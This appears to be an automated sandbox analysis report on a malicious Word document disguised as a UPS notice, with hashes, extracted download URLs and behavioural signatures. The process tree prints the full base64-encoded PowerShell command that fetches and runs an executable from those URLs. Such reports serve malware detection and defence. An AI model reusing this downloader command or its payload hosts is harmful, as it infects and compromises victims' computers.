Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
02-05-2022 21:04
Static task
static1
Behavioral task
behavioral1
Sample
UPS-BJ8MNBX02UY0QJ.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
UPS-BJ8MNBX02UY0QJ.doc
Resource
win10v2004-20220414-en
General
-
Target
UPS-BJ8MNBX02UY0QJ.doc
-
Size
161KB
-
MD5
3a864f7c64c77a701b9aec3dbcb4389f
-
SHA1
1a1cfdbbded9a84be91aac5064a21c591710049c
-
SHA256
46946372c81802503f01b6d9739fd4dd9fe39225973c8b9c22ef625666d48deb
-
SHA512
9d602204fdbb18243c1aa28a293618aa588406a593f949807e30f8b4d20e95b94582687b251b86a10edb9625f7cca89dd8def77cdb86af0acb8300ec08a6d9ac
Malware Config
Extracted
http://kompy.cba.pl/gif/lN_dl/
http://fisiobianchini.com.br/wp-content/uploads/2016/05/S_U/
http://dev.dimatech.org/wp-admin/Hu_jj/
http://juangrela.com/admin/bB_m/
http://coupedecheveux.org/yu71t1x/c_V/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2356 4592 powershell.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 50 2356 powershell.exe 53 2356 powershell.exe 57 2356 powershell.exe 62 2356 powershell.exe 69 2356 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1532 WINWORD.EXE 1532 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2356 powershell.exe 2356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1532 WINWORD.EXE 1532 WINWORD.EXE 1532 WINWORD.EXE 1532 WINWORD.EXE 1532 WINWORD.EXE 1532 WINWORD.EXE 1532 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\UPS-BJ8MNBX02UY0QJ.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABBAFoAQwBBAEQANABaAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAJwAsACcATABBADQARABBAEIAJwApADsAJABvAEEAQQBrAGMAdwBHAG8APQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwB0ACcAKQAgACgAJwBOAGUAdAAuAFcAZQBiAEMAbABpACcAKwAnAGUAbgAnACsAJwB0ACcAKQA7ACQAaQBrAEIAQgBDAEEAeAA9ACgAIgB7ADEAOQB9AHsAOQB9AHsANQB9AHsAMQB9AHsAMQA0AH0AewA3AH0AewAxADUAfQB7ADIAMgB9AHsAMQA3AH0AewAzADUAfQB7ADMAMgB9AHsAMQAxAH0AewAyADQAfQB7ADEANgB9AHsAMgA4AH0AewAyADYAfQB7ADMAMwB9AHsANgB9AHsAMgAxAH0AewAyADUAfQB7ADQAfQB7ADEAMgB9AHsAMgA3AH0AewAzAH0AewAxADAAfQB7ADMAMAB9AHsAMgB9AHsAOAB9AHsAMwA0AH0AewAxADgAfQB7ADMAMQB9AHsAMAB9AHsAMQAzAH0AewAyADAAfQB7ADIAOQB9AHsAMgAzAH0AIgAtAGYAIAAnAGUAZAAnACwAJwBrAG8AbQBwAHkALgAnACwAJwBjAG8AbQAvAGEAJwAsACcAOgAvAC8AJwAsACcAaQBtAGEAdABlAGMAaAAnACwAJwAvAC8AJwAsACcALwBTAF8AVQAvAEAAaAB0AHQAcAAnACwAJwAvAGcAaQBmACcALAAnAGQAbQBpACcALAAnAHAAOgAnACwAJwBqAHUAYQBuAGcAJwAsACcAbgAnACwAJwAuACcALAAnAGUAYwBoAGUAdgAnACwAJwBjAGIAYQAuAHAAbAAnACwAJwAvAGwATgAnACwAJwBoAGkAbgBpAC4AYwBvAG0AJwAsACcAbAAvACcALAAnAF8AbQAvAEAAaAB0AHQAcAA6ACcALAAnAGgAdAB0ACcALAAnAGUAdQB4AC4AbwByACcALAAnADoALwAvAGQAZQB2AC4AJwAsACcAXwBkACcALAAnAC8AeQB1ADcAMQB0ADEAeAAvAGMAXwBWAC8AJwAsACcAYwAnACwAJwBkACcALAAnAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADIAJwAsACcAbwByAGcALwB3AHAALQBhAGQAbQBpAG4ALwBIAHUAXwBqAGoALwBAAGgAdAB0AHAAJwAsACcALgBiAHIALwB3AHAALQBjACcALAAnAGcAJwAsACcAcgBlAGwAYQAuACcALAAnAC8ALwBjAG8AdQBwACcALAAnADoALwAvAGYAaQBzAGkAbwBiAGkAYQAnACwAJwAwADEANgAvADAANQAnACwAJwBuAC8AYgBCACcALAAnAEAAaAB0AHQAcAAnACkALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAaQB0ACcALAAnAFMAcABsACcAKQAuAEkAbgB2AG8AawBlACgAJwBAACcAKQA7ACQAbwBBAFoAWABRAEEAQgAxAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBBAEMAJwAsACcAQQBBAEEAQQAnACwAJwBjACcAKQA7ACQARQBvAFUAeABRAG8AIAA9ACAAJwA2ADYAMAAnADsAJABvADQAVQBvADEARABaAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEARwBCACcALAAnAEEARABDAEEAJwAsACcAUQAnACkAOwAkAEwAWABEAEEAMQBBAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAG8AVQB4AFEAbwArACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALgAnACwAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABSAF8AQQBfAEEARABBAFoAIABpAG4AIAAkAGkAawBCAEIAQwBBAHgAKQB7AHQAcgB5AHsAJABvAEEAQQBrAGMAdwBHAG8ALgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAbABlACcALAAnAEQAbwB3ACcALAAnAGEAZABGAGkAJwAsACcAbgBsAG8AJwApAC4ASQBuAHYAbwBrAGUAKAAkAFIAXwBBAF8AQQBEAEEAWgAsACAAJABMAFgARABBADEAQQApADsAJABCAG8ARABHAHgAQQBBAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAEEAQQAnACwAJwBRAEEAWABBACcALAAnAEMAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEwAWABEAEEAMQBBACkALgAiAGwAZQBOAGAAZwBgAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAbwBrAGUALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQATABYAEQAQQAxAEEAOwAkAHYAQQBVAEEAWgBBAEEAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAFoAVQBRADQAJwAsACcASABBADEAQQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagB3AEMAQQBrAEEAXwBBAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBEADEAJwAsACcAQQBaACcALAAnAGgAQQBBACcAKQA7AA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1532-130-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/1532-131-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/1532-132-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/1532-133-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/1532-134-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/1532-135-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmpFilesize
64KB
-
memory/1532-136-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmpFilesize
64KB
-
memory/1532-137-0x000002E461000000-0x000002E461004000-memory.dmpFilesize
16KB
-
memory/2356-138-0x000002BA42E50000-0x000002BA42E72000-memory.dmpFilesize
136KB
-
memory/2356-139-0x00007FFAA6EF0000-0x00007FFAA79B1000-memory.dmpFilesize
10.8MB